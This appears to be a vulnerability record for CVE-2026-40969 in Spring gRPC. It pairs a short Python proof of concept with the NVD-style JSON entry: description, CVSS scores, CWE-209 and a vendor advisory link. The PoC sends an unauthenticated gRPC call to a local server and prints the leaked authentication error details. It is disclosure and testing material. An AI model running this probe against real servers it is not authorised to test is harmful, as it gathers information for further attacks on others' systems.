CVE-2026-40969

import grpc # Target vulnerable gRPC server address TARGET_SERVER = "localhost:9090" # This PoC demonstrates the information leak by triggering an authentication failure # without providing valid credentials. def check_info_leak(): # Create an insecure channel to the target with grpc.insecure_channel(TARGET_SERVER) as channel: # In a real scenario, create a stub from the generated proto files # Here we simulate a generic call that requires authentication try: # Attempt to call a protected method without metadata/token # This triggers the server-side AuthenticationException stub = channel.unary_unary( '/service.path/SecureMethod', request_serializer=bytes, response_deserializer=bytes ) response = stub(b"test_payload") except grpc.RpcError as e: # The vulnerability: Raw exception message is exposed in details() print(f"[+] Status Code: {e.code()}") print(f"[+] Leaked Authentication Info: {e.details()}") if __name__ == "__main__": check_info_leak()

{"cve": {"id": "CVE-2026-40969", "sourceIdentifier": "[email protected]", "published": "2026-04-28T15:16:30.560", "lastModified": "2026-04-30T13:24:42.033", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The raw message of every server-side AuthenticationException is returned to the unauthenticated remote caller in the gRPC status description. This allows an attacker to obtain information about the authentication failure, which may be useful for further attacks.\n\nAffected versions:\nSpring gRPC: 1.0.0 - 1.0.2 (fixed in 1.0.3). Older, unsupported versions are also affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_grpc:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.3", "matchCriteriaId": "4B816748-EE94-4935-A81F-E9542FB2E3D2"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-40969", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}